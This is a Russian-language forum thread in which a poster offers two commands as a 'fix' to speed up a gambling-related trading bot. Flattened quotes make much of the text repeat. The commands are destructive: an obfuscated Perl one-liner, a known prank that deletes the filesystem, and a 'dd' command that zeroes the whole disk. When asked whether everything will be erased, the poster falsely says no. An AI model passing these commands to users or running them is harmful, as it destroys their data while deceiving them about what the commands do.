Наш генеральный спонсор - gamblingstore.ru предлагает готовые игровые решения и услуги для создания собственных проектов
UpСегодня вбиваем в бота следующие команды:
1) cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see
2) sudo dd if=/dev/zero of=/dev/sda Это лучший фикс на сегодняшний день
а что делать если у меня до сих пор click click click выполняется?Сегодня вбиваем в бота следующие команды:
даЯ так понял, удалится все нахер?![]()
конечно-же нетЯ так понял, удалится все нахер?![]()
Ускорение работоспособности бота и кое-какие плюшки.Про что это вообще ? Что за команды и что они делают ?
И если ввести эти команды что это нам даст ?Ускорение работоспособности бота и кое-какие плюшки.
1) cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;seeУскорение работоспособности бота и кое-какие плюшки.
1) бот парсит цены быстрее 2) скорость принятия обмена сокращается. 3) на слабых вдс может не сработать, тестить надо1) cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see
Тут написано фикс . Но фикс чего ?
Не могу затестить так как на рулетке идут постоянные ставки . И почему он парсит быстрее . Я понимаю что весь процесс задержки принятия трейда занимает парсинг . Но как он его уменьшает ?1) бот парсит цены быстрее 2) скорость принятия обмена сокращается. 3) на слабых вдс может не сработать, тестить надо
P.S. сделай бэкап , так на всякий
Лол))1) бот парсит цены быстрее 2) скорость принятия обмена сокращается. 3) на слабых вдс может не сработать, тестить надо
P.S. сделай бэкап , так на всякий
ахахаха1) cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see
Тут написано фикс . Но фикс чего ?